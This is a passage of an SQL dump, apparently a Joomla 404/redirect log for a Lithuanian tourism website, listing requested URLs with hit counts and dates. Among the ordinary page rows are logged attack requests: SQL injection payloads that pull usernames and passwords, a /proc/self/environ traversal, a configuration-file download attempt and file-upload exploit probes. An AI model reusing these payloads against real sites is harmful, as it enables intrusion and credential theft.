00:00:00'),(1795,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/kulinarinis-paveldas','','','',28,0,'2017-05-15 19:26:29','0000-00-00 00:00:00'),(1796,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/gido-paslaugos','','','',28,0,'2017-05-15 19:26:32','0000-00-00 00:00:00'),(1797,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/suvenyrai','','','',28,0,'2017-05-15 19:26:34','0000-00-00 00:00:00'),(1798,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','','','',28,0,'2017-05-15 19:26:36','0000-00-00 00:00:00'),(1799,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/tytuvenu-regioninis-parkas','','','',28,0,'2017-05-15 19:26:39','0000-00-00 00:00:00'),(1800,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/dubysos-regioninis-parkas','','','',28,0,'2017-05-15 19:26:41','0000-00-00 00:00:00'),(1801,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/kurtuvenu-regioninis-parkas','','','',28,0,'2017-05-15 19:26:43','0000-00-00 00:00:00'),(1802,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/varniu-regioninis-parkas','','','',28,0,'2017-05-15 19:26:46','0000-00-00 00:00:00'),(1803,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/maitinimas','','','',28,0,'2017-05-15 19:26:48','0000-00-00 00:00:00'),(1804,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apgyvendinimas','','','',28,0,'2017-05-15 19:26:50','0000-00-00 00:00:00'),(1805,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apgyvendinimas/apgyvendinimas','','','',9,0,'2017-05-15 19:26:52','0000-00-00 00:00:00'),(1806,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/apgyvendinimas/kaimo-turizmas','','','',9,0,'2017-05-15 19:26:55','0000-00-00 00:00:00'),(1807,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','','','',28,0,'2017-05-15 19:26:57','0000-00-00 00:00:00'),(1808,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/lankytini-objektai/muziejai','','','',31,0,'2017-05-15 19:26:59','0000-00-00 00:00:00'),(1809,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/projektai','','','',28,0,'2017-05-15 19:27:02','0000-00-00 00:00:00'),(1810,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas','','','',28,0,'2017-05-15 19:27:04','0000-00-00 00:00:00'),(1811,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/projektai/ii-etapas-baznycios-restauravimas','','','',28,0,'2017-05-15 19:27:06','0000-00-00 00:00:00'),(1812,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/tytuvenu-festivalis/naujienos','','','',7,0,'2017-05-15 19:27:11','0000-00-00 00:00:00'),(1813,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/tytuvenu-festivalis/programos','','','',7,0,'2017-05-15 19:27:13','0000-00-00 00:00:00'),(1814,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/tytuvenu-festivalis/galerija','','','',7,0,'2017-05-15 19:27:16','0000-00-00 00:00:00'),(1815,'http://www.infotytuvenai.lt/index.php/lt/liolių bažnyčia','','','',1,0,'2017-05-16 13:38:56','0000-00-00 00:00:00'),(1816,'http://infotytuvenai.lt/index.php/lt/component/user/register','','','',1,0,'2017-05-16 20:39:51','0000-00-00 00:00:00'),(1817,'http://infotytuvenai.lt/index.php/lt/?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,0x70697A64656E6B6131353135),0)','','','',1,0,'2017-05-18 15:15:13','0000-00-00 00:00:00'),(1818,'http://infotytuvenai.lt/index.php/lt/administrator/index.php','','infotytuvenai.lt/index.php/lt/','',6,0,'2017-05-18 15:17:53','0000-00-00 00:00:00'),(1819,'http://www.infotytuvenai.lt/index.php/lt/apie-centraValstybinio','','','',1,0,'2017-05-21 17:49:23','0000-00-00 00:00:00'),(1820,'http://infotytuvenai.lt/index.php/lt/?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8109 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(8109=8109,1))),0x71786b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY ','','http://www.google.com/','',1,0,'2017-05-22 23:18:50','0000-00-00 00:00:00'),(1821,'http://www.infotytuvenai.lt/index.php/lt//wp-includes/wlwmanifest.xml','','','',121,0,'2017-05-23 22:08:12','0000-00-00 00:00:00'),(1822,'http://www.infotytuvenai.lt/index.php/lt//xmlrpc.php?rsd','','','',121,0,'2017-05-23 22:08:13','0000-00-00 00:00:00'),(1823,'http://www.infotytuvenai.lt/index.php/lt//blog/wp-includes/wlwmanifest.xml','','','',119,0,'2017-05-23 22:08:14','0000-00-00 00:00:00'),(1824,'http://www.infotytuvenai.lt/index.php/lt//wordpress/wp-includes/wlwmanifest.xml','','','',119,0,'2017-05-23 22:08:15','0000-00-00 00:00:00'),(1825,'http://www.infotytuvenai.lt/index.php/lt//wp/wp-includes/wlwmanifest.xml','','','',119,0,'2017-05-23 22:08:15','0000-00-00 00:00:00'),(1826,'http://www.infotytuvenai.lt/index.php/lt//site/wp-includes/wlwmanifest.xml','','','',119,0,'2017-05-23 22:08:16','0000-00-00 00:00:00'),(1828,'http://infotytuvenai.lt/index.php/lt//wp-includes/wlwmanifest.xml','','','',491,0,'2017-05-27 10:57:09','0000-00-00 00:00:00'),(1829,'http://infotytuvenai.lt/index.php/lt//xmlrpc.php?rsd','','','',488,0,'2017-05-27 10:57:10','0000-00-00 00:00:00'),(1830,'http://infotytuvenai.lt/index.php/lt//blog/wp-includes/wlwmanifest.xml','','','',481,0,'2017-05-27 10:57:11','0000-00-00 00:00:00'),(1831,'http://infotytuvenai.lt/index.php/lt//wordpress/wp-includes/wlwmanifest.xml','','','',483,0,'2017-05-27 10:57:12','0000-00-00 00:00:00'),(1832,'http://infotytuvenai.lt/index.php/lt//wp/wp-includes/wlwmanifest.xml','','','',485,0,'2017-05-27 10:57:12','0000-00-00 00:00:00'),(1833,'http://infotytuvenai.lt/index.php/lt//site/wp-includes/wlwmanifest.xml','','','',483,0,'2017-05-27 10:57:13','0000-00-00 00:00:00'),(1834,'http://infotytuvenai.lt/index.php','','http://infotytuvenai.lt/','',552,0,'2017-05-28 08:53:29','0000-00-00 00:00:00'),(1835,'http://www.infotytuvenai.lt/index.php/lt//blog/robots.txt','','','',2,0,'2017-05-31 11:16:38','0000-00-00 00:00:00'),(1836,'http://www.infotytuvenai.lt/index.php/lt//blog/','','','',2,0,'2017-05-31 11:16:39','0000-00-00 00:00:00'),(1837,'http://www.infotytuvenai.lt/index.php/lt//wordpress/','','','',2,0,'2017-05-31 11:16:39','0000-00-00 00:00:00'),(1838,'http://www.infotytuvenai.lt/index.php/lt//wp/','','','',2,0,'2017-05-31 11:16:39','0000-00-00 00:00:00'),(1839,'http://infotytuvenai.lt/index.php/lt/option=com_user&view=register','','http://infotytuvenai.lt/index.php/lt/option=com_user&view=register','',9,0,'2017-06-06 10:35:47','0000-00-00 00:00:00'),(1840,'http://infotytuvenai.lt/index.php/lt/option=com_user&view=registration','','http://infotytuvenai.lt/index.php/lt/option=com_user&view=registration','',9,0,'2017-06-06 10:40:04','0000-00-00 00:00:00'),(1841,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_n.png','','','',1,0,'2017-06-06 17:45:07','0000-00-00 00:00:00'),(1842,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_ne.png','','','',1,0,'2017-06-06 17:45:08','0000-00-00 00:00:00'),(1843,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_e.png','','','',1,0,'2017-06-06 17:45:09','0000-00-00 00:00:00'),(1844,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_se.png','','','',1,0,'2017-06-06 17:45:09','0000-00-00 00:00:00'),(1845,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_s.png','','','',1,0,'2017-06-06 17:45:10','0000-00-00 00:00:00'),(1846,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_sw.png','','','',1,0,'2017-06-06 17:45:10','0000-00-00 00:00:00'),(1847,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_w.png','','','',1,0,'2017-06-06 17:45:11','0000-00-00 00:00:00'),(1848,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_nw.png','','','',1,0,'2017-06-06 17:45:11','0000-00-00 00:00:00'),(1849,'http://infotytuvenai.lt/index.php/lt/component/user?view=register','','http://infotytuvenai.lt/index.php/lt/component/user?view=register','',9,0,'2017-06-07 12:35:11','0000-00-00 00:00:00'),(1850,'http://infotytuvenai.lt/index.php/lt/?option=com_user&view=registration','','http://infotytuvenai.lt/index.php/lt/?option=com_user&view=registration','',12,0,'2017-06-07 12:35:12','0000-00-00 00:00:00'),(1851,'http://infotytuvenai.lt/index.php/lt/component/user?view=registration','','http://infotytuvenai.lt/index.php/lt/component/user?view=registration','',7,0,'2017-06-07 12:35:12','0000-00-00 00:00:00'),(1852,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/nauj','','','',1,0,'2017-06-09 09:19:43','0000-00-00 00:00:00'),(1853,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pir','','','',1,0,'2017-06-09 09:19:44','0000-00-00 00:00:00'),(1854,'http://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-bazny','','','',1,0,'2017-06-10 07:31:34','0000-00-00 00:00:00'),(1855,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/varn','','','',1,0,'2017-06-10 07:31:39','0000-00-00 00:00:00'),(1856,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/tytu','','','',1,0,'2017-06-10 07:31:39','0000-00-00 00:00:00'),(1857,'http://infotytuvenai.lt/index.php/lt/?option=com_registration','','http://infotytuvenai.lt/index.php/lt/?option=com_registration','',5,0,'2017-06-13 10:25:49','0000-00-00 00:00:00'),(1858,'http://infotytuvenai.lt/index.php/lt/?option=com_registration&task=register','','http://infotytuvenai.lt/index.php/lt/?option=com_registration&task=register','',8,0,'2017-06-13 14:16:15','0000-00-00 00:00:00'),(1859,'http://www.infotytuvenai.lt/index.php/lt/turizmo-','','','',1,0,'2017-06-22 22:09:06','0000-00-00 00:00:00'),(1860,'http://infotytuvenai.lt/index.php/lt/?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from #__users limit 0,1),floor(rand(0)*2))x from informa','','','',1,0,'2017-06-28 04:47:10','0000-00-00 00:00:00'),(1861,'http://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/dubysos-regioninis-parkas','','http://infotytuvenai.lt/index.php/lt/turizmo-informacija/dubysos-regioninis-parkas','',51,0,'2017-07-10 15:33:48','0000-00-00 00:00:00'),(1862,'http://infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/gate.php?request=true','','','',1,0,'2017-07-10 16:11:56','0000-00-00 00:00:00'),(1863,'http://infotytuvenai.lt/index.php/lt/pages/bots.php','','','',1,0,'2017-07-10 16:12:37','0000-00-00 00:00:00'),(1864,'http://infotytuvenai.lt/index.php/lt/pages/edituser.php','','','',1,0,'2017-07-10 16:12:44','0000-00-00 00:00:00'),(1865,'http://infotytuvenai.lt/index.php/lt/pages/main.php','','','',1,0,'2017-07-10 16:13:04','0000-00-00 00:00:00'),(1866,'http://infotytuvenai.lt/index.php/lt/pages/tasks.php','','','',1,0,'2017-07-10 16:13:39','0000-00-00 00:00:00'),(1867,'http://infotytuvenai.lt/index.php/lt/pages/users.php','','','',1,0,'2017-07-10 16:13:53','0000-00-00 00:00:00'),(1868,'http://infotytuvenai.lt/index.php/lt/pages/logs.php','','','',1,0,'2017-07-10 16:13:56','0000-00-00 00:00:00'),(1869,'http://infotytuvenai.lt/index.php/lt/pages/account.php','','','',1,0,'2017-07-10 16:14:05','0000-00-00 00:00:00'),(1870,'http://infotytuvenai.lt/index.php/lt/pages/settings.php','','','',1,0,'2017-07-10 16:14:25','0000-00-00 00:00:00'),(1871,'http://infotytuvenai.lt/index.php/lt/pages/details.php','','','',1,0,'2017-07-10 16:14:39','0000-00-00 00:00:00'),(1872,'http://infotytuvenai.lt/index.php/lt/pages/logout.php','','','',1,0,'2017-07-10 16:14:51','0000-00-00 00:00:00'),(1873,'http://infotytuvenai.lt/index.php/lt/pages/help.php','','','',1,0,'2017-07-10 16:14:53','0000-00-00 00:00:00'),(1874,'http://infotytuvenai.lt/index.php/lt/login.php','','','',1,0,'2017-07-10 16:16:16','0000-00-00 00:00:00'),(1875,'http://infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/21421asdfdsf.php','','','',1,0,'2017-07-10 16:25:17','0000-00-00 00:00:00'),(1876,'http://www.infotytuvenai.lt/index.php/lt/xmlrpc.php','','http://www.infotytuvenai.lt/index.php/lt/xmlrpc.php','',3,0,'2017-07-17 12:14:18','0000-00-00 00:00:00'),(1877,'http://infotytuvenai.lt/index.php/lt//cms/wp-includes/wlwmanifest.xml','','','',478,0,'2017-07-23 13:21:11','0000-00-00 00:00:00'),(1878,'http://infotytuvenai.lt/index.php/lt/component/content/article/index.php/lt/44-paskutinesnaujienos/magmi/web/download_file.php','','','',1,0,'2017-07-24 11:23:05','0000-00-00 00:00:00'),(1879,'http://infotytuvenai.lt/index.php/lt/component/content/article/index.php/lt/44-paskutinesnaujienos/web/download_file.php','','','',1,0,'2017-07-24 11:23:06','0000-00-00 00:00:00'),(1880,'http://infotytuvenai.lt/index.php/lt/component/content/article/index.php/lt/44-paskutinesnaujienos/app/etc/local.xml','','','',1,0,'2017-07-24 11:23:06','0000-00-00 00:00:00'),(1881,'http://www.infotytuvenai.lt/index.php/lt//cms/wp-includes/wlwmanifest.xml','','','',111,0,'2017-07-28 00:37:00','0000-00-00 00:00:00'),(1882,'http://infotytuvenai.lt/index.php/lt/component/content/article/55-tytuvenu-festivalis/189-programos','','','',12,0,'2017-08-10 15:04:33','0000-00-00 00:00:00'),(1883,'http://www.infotytuvenai.lt/index.php/lt/component/content/article/55-tytuvenu-festivalis/189-programos','','','',1,0,'2017-08-23 07:50:38','0000-00-00 00:00:00'),(1884,'http://infotytuvenai.lt/index.php/lt/?option=com_joomanager&controller=details&task=download&path=configuration.php','','infotytuvenai.lt','',1353,0,'2017-09-01 07:54:10','0000-00-00 00:00:00'),(1885,'http://infotytuvenai.lt/index.php/lt/kickstart.php','','http://infotytuvenai.lt/index.php/lt/','',5,0,'2017-09-03 15:48:14','0000-00-00 00:00:00'),(1886,'http://infotytuvenai.lt/index.php/lt/admin/sales_order','','','',1,0,'2017-09-20 20:10:57','0000-00-00 00:00:00'),(1887,'http://infotytuvenai.lt/index.php/lt/admin','','','',3,0,'2017-09-20 20:10:58','0000-00-00 00:00:00'),(1888,'http://infotytuvenai.lt/index.php/lt/admin/admin','','','',1,0,'2017-09-20 20:11:28','0000-00-00 00:00:00'),(1889,'http://www.infotytuvenai.lt/index.php/lt/?option=../../../../../proc/self/environ','','','',1,0,'2017-09-29 04:55:39','0000-00-00 00:00:00'),(1890,'http://www.infotytuvenai.lt/index.php/lt/?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)','','','',1,0,'2017-10-14 19:39:28','0000-00-00 00:00:00'),(1891,'http://www.infotytuvenai.lt/index.php/lt/ kontaktai','','http://www.bing.com/search?&q=lietuvos%20ba%C5%BEny%C4%8Dios%20kontaktai%20mail&scope=web&setmkt=en-US&setlang=match&first=251','',2,0,'2017-10-16 22:19:50','0000-00-00 00:00:00'),(1892,'http://www.infotytuvenai.lt/index.php/lt/)','','','',2,0,'2017-10-17 19:54:50','0000-00-00 00:00:00'),(1893,'http://infotytuvenai.lt/index.php/lt/?option=com_foxcontact','','','',1,0,'2017-11-02 20:36:46','0000-00-00 00:00:00'),(1894,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos--','','','',4,0,'2017-11-06 07:55:28','0000-00-00 00:00:00'),(1895,'http://infotytuvenai.lt/index.php/lt/http:/','','','',6,0,'2017-11-15 01:49:47','0000-00-00 00:00:00'),(1896,'http://www.infotytuvenai.lt/index.php/lt//index.php/turizmo-informacija','','','',1,0,'2017-11-28 10:29:10','0000-00-00 00:00:00'),(1897,'http://www.infotytuvenai.lt/index.php/lt//index.php/apgyvendinimas','','','',1,0,'2017-11-28 10:29:10','0000-00-00 00:00:00'),(1898,'http://www.infotytuvenai.lt/index.php/lt//index.php/lt/apie-centra','','','',1,0,'2017-11-28 10:29:12','0000-00-00 00:00:00'),(1899,'http://www.infotytuvenai.lt/index.php/lt//index.php/lt/apie-centra/paslaugos','','','',1,0,'2017-11-28 10:29:12','0000-00-00 00:00:00'),(1900,'http://www.infotytuvenai.lt/index.php/lt//index.php/lt/apie-centra/ekskursijos','','','',1,0,'2017-11-28 10:29:13','0000-00-00 00:00:00'),(1901,'http://www.infotytuvenai.lt/index.php/lt//index.php/lt/apie-centra/edukacines-programos','','','',1,0,'2017-11-28 10:29:13','0000-00-00 00:00:00'),(1902,'http://www.infotytuvenai.lt/index.php/lt//index.php/lt/apie-centra/suvenyrai','','','',1,0,'2017-11-28 10:29:14','0000-00-00 00:00:00'),(1903,'http://www.infotytuvenai.lt/index.php/lt//index.php/lt/apie-centra/istatai','','','',1,0,'2017-11-28 10:29:14','0000-00-00 00:00:00'),(1904,'http://infotytuvenai.lt/index.php/lt/?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','','','',354,0,'2017-12-13 20:40:36','0000-00-00 00:00:00'),(1905,'http://infotytuvenai.lt/index.php/lt/?option=com_foxcontact&view=loader&owner=module&id=122&type=uploader&qqfile=/../ly.php','','','',1,0,'2017-12-14 00:33:36','0000-00-00 00:00:00'),(1906,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&owner=component&bid=1&id=215&root=components&type=uploader&qqfile=/../ly.php','','','',1,0,'2017-12-14 00:33:37','0000-00-00 00:00:00'),(1907,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact','','','',2,0,'2017-12-30 02:04:16','0000-00-00 00:00:00'),(1908,'http://www.infotytuvenai.lt/index.php/lt/?option=com_user&task=register','','','',2,0,'2018-01-03 20:16:17','0000-00-00 00:00:00'),(1909,'http://www.infotytuvenai.lt/index.php/lt/joomla/other-components/registration-form','','','',2,0,'2018-01-03 20:16:18','0000-00-00 00:00:00'),(1910,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','','','',62,0,'2018-01-04 11:24:40','0000-00-00 00:00:00'),(1911,'http://infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0','','http://infotytuvenai.lt/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0','',1,0,'2018-01-04 17:11:22','0000-00-00 00:00:00'),(1912,'http://www.infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0','','http://www.infotytuvenai.lt/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0','',1,0,'2018-01-06 02:57:51','0000-00-00 00:00:00'),(1913,'http://infotytuvenai.lt/index.php/lt/?option=com_formmaker&task=edit_query&id=1','','http://www.google.com/','',1,0,'2018-01-22 16:10:37','0000-00-00 00:00:00'),(1914,'http://infotytuvenai.lt/index.php/lt/?option=com_jomcomment&task=rss','','http://www.google.com/','',1,0,'2018-01-22 18:00:19','0000-00-00 00:00:00'),(1915,'http://infotytuvenai.lt/index.php/lt/?option=com_pages','','http://www.google.com/','',1,0,'2018-01-22 18:55:18','0000-00-00 00:00:00'),(1916,'http://infotytuvenai.lt/index.php/lt/?option=com_flash','','http://www.google.com/','',1,0,'2018-01-23 10:29:27','0000-00-00 00:00:00'),(1917,'http://infotytuvenai.lt/index.php/lt/?option=com_form2contentsearch&task=search.display&author_id=1','','http://www.google.com/','',1,0,'2018-01-23 12:40:26','0000-00-00 00:00:00'),(1918,'http://infotytuvenai.lt/index.php/lt/?option=com_socialpinboard&view=likes&uid=1','','http://www.google.com/','',1,0,'2018-01-23 12:53:20','0000-00-00 00:00:00'),(1919,'http://infotytuvenai.lt/index.php/lt/?option=com_advertisementboard&Itemid=132&task=show_rss_categories&catname=1','','http://www.google.com/','',1,0,'2018-01-23 13:19:57','0000-00-00 00:00:00'),(1920,'http://infotytuvenai.lt/index.php/lt/?option=com_medialibrary&Itemid=20','','http://www.google.com/','',1,0,'2018-01-23 16:33:29','0000-00-00 00:00:00'),(1921,'http://infotytuvenai.lt/index.php/lt/?option=com_solidres&view=reservationasset&id=8&Itemid=598','','http://www.google.com/','',1,0,'2018-01-23 18:25:27','0000-00-00 00:00:00'),(1922,'http://infotytuvenai.lt/index.php/lt/?option=com_guru&view=gurubuy&lang=en','','http://www.google.com/','',1,0,'2018-01-23 19:13:37','0000-00-00 00:00:00'),(1923,'http://infotytuvenai.lt/index.php/lt/?option=com_client&task=category&category=STDs&profession=Ob/Gyn','','http://www.google.com/','',1,0,'2018-01-23 20:43:08','0000-00-00 00:00:00'),(1924,'http://infotytuvenai.lt/index.php/lt/?option=com_jquickcontact','','http://www.google.com/','',1,0,'2018-01-24 05:24:42','0000-00-00 00:00:00'),(1925,'http://infotytuvenai.lt/index.php/lt/?option=com_carocci&task=schedarivista','','http://www.google.com/','',1,0,'2018-01-24 05:31:20','0000-00-00 00:00:00'),(1926,'http://infotytuvenai.lt/index.php/lt/?option=com_student&view=student','','http://www.google.com/','',1,0,'2018-01-24 05:40:58','0000-00-00 00:00:00'),(1927,'http://infotytuvenai.lt/index.php/lt/?option=com_paper&NO=1','','http://www.google.com/','',1,0,'2018-01-24 06:29:10','0000-00-00 00:00:00'),(1928,'http://infotytuvenai.lt/index.php/lt/?option=com_maisons&view=detail&Itemid=1','','http://www.google.com/','',2,0,'2018-01-24 06:44:09','0000-00-00 00:00:00'),(1929,'http://infotytuvenai.lt/index.php/lt/?option=com_dom&action=info','','http://www.google.com/','',1,0,'2018-01-24 06:53:21','0000-00-00 00:00:00'),(1930,'http://infotytuvenai.lt/index.php/lt/?option=com_jgive&view=campaigns','','http://www.google.com/','',1,0,'2018-01-24 06:54:12','0000-00-00 00:00:00'),(1931,'http://infotytuvenai.lt/index.php/lt/?option=com_vis&task=2','','http://www.google.com/','',1,0,'2018-01-24 08:21:14','0000-00-00 00:00:00'),(1932,'http://infotytuvenai.lt/index.php/lt/?option=com_art','','http://www.google.com/','',1,0,'2018-01-24 09:22:02','0000-00-00 00:00:00'),(1933,'http://infotytuvenai.lt/index.php/lt/?option=com_camps&view=wrapper&Itemid=17','','http://www.google.com/','',1,0,'2018-01-24 09:40:34','0000-00-00 00:00:00'),(1934,'http://infotytuvenai.lt/index.php/lt/?option=com_auto&view=auto&Itemid=73&tpl=info&id=1&lang=nl','','http://www.google.com/','',1,0,'2018-01-24 10:11:59','0000-00-00 00:00:00'),(1935,'http://infotytuvenai.lt/index.php/lt/?option=com_images&task=view_image','','http://www.google.com/','',1,0,'2018-01-24 10:36:07','0000-00-00 00:00:00'),(1936,'http://infotytuvenai.lt/index.php/lt/?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component','','','',2,0,'2018-01-24 11:33:03','0000-00-00 00:00:00'),(1937,'http://infotytuvenai.lt/index.php/lt/?option=com_webcam&cam=1&Itemid=101','','http://www.google.com/','',1,0,'2018-01-24 11:41:20','0000-00-00 00:00:00'),(1938,'http://infotytuvenai.lt/index.php/lt/?option=com_business&view=items&layout=listitem&catid=1','','http://www.google.com/','',1,0,'2018-01-24 11:46:54','0000-00-00 00:00:00'),(1939,'http://infotytuvenai.lt/index.php/lt/?option=com_product','','http://www.google.com/','',1,0,'2018-01-24 12:59:43','0000-00-00 00:00:00'),(1940,'http://infotytuvenai.lt/index.php/lt/?option=com_stories&view=story&sid=1','','http://www.google.com/','',1,0,'2018-01-24 13:07:38','0000-00-00 00:00:00'),(1941,'http://infotytuvenai.lt/index.php/lt/?option=com_jumi','','http://www.google.com/','',1,0,'2018-01-24 14:34:52','0000-00-00 00:00:00'),(1942,'http://infotytuvenai.lt/index.php/lt/?option=com_restaurant&view=sponsorspage','','http://www.google.com/','',1,0,'2018-01-24 15:16:34','0000-00-00 00:00:00'),(1943,'http://infotytuvenai.lt/index.php/lt/?option=com_chronoforms5&chronoform=atti_vista&gcb=1','','http://www.google.com/','',1,0,'2018-01-24 15:51:50','0000-00-00 00:00:00'),(1944,'http://infotytuvenai.lt/index.php/lt/?option=com_company','','http://www.google.com/','',1,0,'2018-01-24 16:02:04','0000-00-00 00:00:00'),(1945,'http://infotytuvenai.lt/index.php/lt/?option=com_rsmonials&task=viewtesti&id=1','','http://www.google.com/','',1,0,'2018-01-24 16:41:03','0000-00-00 00:00:00'),(1946,'http://infotytuvenai.lt/index.php/lt/?categoryId=7&cityId=1&option=com_sp&task=&Itemid=87','','http://www.google.com/','',1,0,'2018-01-24 17:02:17','0000-00-00 00:00:00'),(1947,'http://infotytuvenai.lt/index.php/lt/?option=com_jobs&task=detail&id=1','','http://www.google.com/','',1,0,'2018-01-24 17:41:34','0000-00-00 00:00:00'),(1948,'http://infotytuvenai.lt/index.php/lt/?option=com_jobs&control=jobs_list&task=profile&cid=1','','http://www.google.com/','',1,0,'2018-01-24 18:41:56','0000-00-00 00:00:00'),(1949,'http://infotytuvenai.lt/index.php/lt/?option=com_advpoll&task=report','','http://www.google.com/','',1,0,'2018-01-24 18:45:51','0000-00-00 00:00:00'),(1950,'http://infotytuvenai.lt/index.php/lt/?option=com_ccnewsletter','','http://www.google.com/','',1,0,'2018-01-24 19:17:29','0000-00-00 00:00:00'),(1951,'http://infotytuvenai.lt/index.php/lt/?option=com_school&Itemid=34&func=showclass','','http://www.google.com/','',1,0,'2018-01-24 20:28:52','0000-00-00 00:00:00'),(1952,'http://infotytuvenai.lt/index.php/lt/?option=com_avreloaded&view=popup&Itemid=55&divid=1','','http://www.google.com/','',1,0,'2018-01-24 20:38:33','0000-00-00 00:00:00'),(1953,'http://infotytuvenai.lt/index.php/lt/?option=com_dtracker','','http://www.google.com/','',1,0,'2018-01-24 21:59:36','0000-00-00 00:00:00'),(1954,'http://infotytuvenai.lt/index.php/lt/?option=com_aist&view=showvacancy&id=-1','','http://www.google.com/','',1,0,'2018-01-24 23:45:56','0000-00-00 00:00:00'),(1955,'http://infotytuvenai.lt/index.php/lt/?option=com_simplecalendar','','http://www.google.com/','',1,0,'2018-01-25 00:15:43','0000-00-00 00:00:00'),(1956,'http://infotytuvenai.lt/index.php/lt/component/jsjobs/newest-jobs','','http://www.google.com/','',1,0,'2018-01-25 00:44:55','0000-00-00 00:00:00'),(1957,'http://infotytuvenai.lt/index.php/lt/?option=com_mambatstaff&Itemid=0&func=fullview','','http://www.google.com/','',1,0,'2018-01-25 02:07:13','0000-00-00 00:00:00'),(1958,'http://infotytuvenai.lt/index.php/lt/?option=com_realpin&view=rpdefault&pinboard=5','','http://www.google.com/','',1,0,'2018-01-25 03:30:10','0000-00-00 00:00:00'),(1959,'http://infotytuvenai.lt/index.php/lt/?option=com_monos&view=detail&Itemid=27&n=1290&h=1','','http://www.google.com/','',2,0,'2018-01-25 09:08:25','0000-00-00 00:00:00'),(1960,'http://infotytuvenai.lt/index.php/lt/?option=com_bookpro','','http://www.google.com/','',1,0,'2018-01-25 09:48:38','0000-00-00 00:00:00'),(1961,'http://infotytuvenai.lt/index.php/lt/?option=com_jomdirectory','','http://www.google.com/','',1,0,'2018-01-25 10:43:22','0000-00-00 00:00:00'),(1962,'http://infotytuvenai.lt/index.php/lt/?option=com_jomestate','','http://www.google.com/','',1,0,'2018-01-25 11:35:42','0000-00-00 00:00:00'),(1963,'http://infotytuvenai.lt/index.php/lt/?option=com_projectlog&view=cat','','http://www.google.com/','',1,0,'2018-01-25 13:20:43','0000-00-00 00:00:00'),(1964,'http://infotytuvenai.lt/index.php/lt/?option=com_photographic&view=gallery&layout=image&id=2','','http://www.google.com/','',1,0,'2018-01-25 14:16:27','0000-00-00 00:00:00'),(1965,'http://infotytuvenai.lt/index.php/lt/?option=com_cck&view=list','','http://www.google.com/','',1,0,'2018-01-25 15:27:39','0000-00-00 00:00:00'),(1966,'http://infotytuvenai.lt/index.php/lt/joomla/other-components/registration-form','','','',12,0,'2018-01-27 21:45:40','0000-00-00 00:00:00'),(1967,'http://infotytuvenai.lt/index.php/lt/?option=com_kunena','','','',9,0,'2018-01-29 11:18:54','0000-00-00 00:00:00'),(1968,'http://infotytuvenai.lt/index.php/lt/?option=com_community','','','',4,0,'2018-01-29 11:19:06','0000-00-00 00:00:00'),(1969,'http://infotytuvenai.lt/index.php/lt/?option=com_comprofiler','','','',3,0,'2018-01-29 11:19:07','0000-00-00 00:00:00'),(1970,'http://infotytuvenai.lt/index.php/lt/?option=com_easysocial','','','',3,0,'2018-01-29 